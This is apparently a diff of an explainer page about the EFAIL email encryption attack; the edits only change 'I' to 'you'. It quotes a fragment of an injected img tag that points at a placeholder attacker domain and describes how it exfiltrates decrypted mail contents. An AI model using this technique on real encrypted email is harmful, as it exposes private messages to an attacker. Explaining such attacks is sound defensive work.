What is efail?

 <img src="http://www.mybaddomain.com/ and appending

-"> to this email by using multipart email encoding, I can force the html engine to decrypt the email and send me the contents as if it were an image file request in an URL encoded string.
+"> to this email by using multipart email encoding, you can force the html engine to decrypt the email and send me the contents as if it were an image file request in an URL encoded string.

 Where can someone leverage this?
 By intercepting an email anywhere in the world, then sending it back to the people with the keys thus encoded, their mail client will intercept it and decode it.
-I can hide the decoding within another email and they’ll be none the wiser after the fact.
+You can hide the decoding within another email and they’ll be none the wiser after the fact.

 How can I mitigate efail attacks?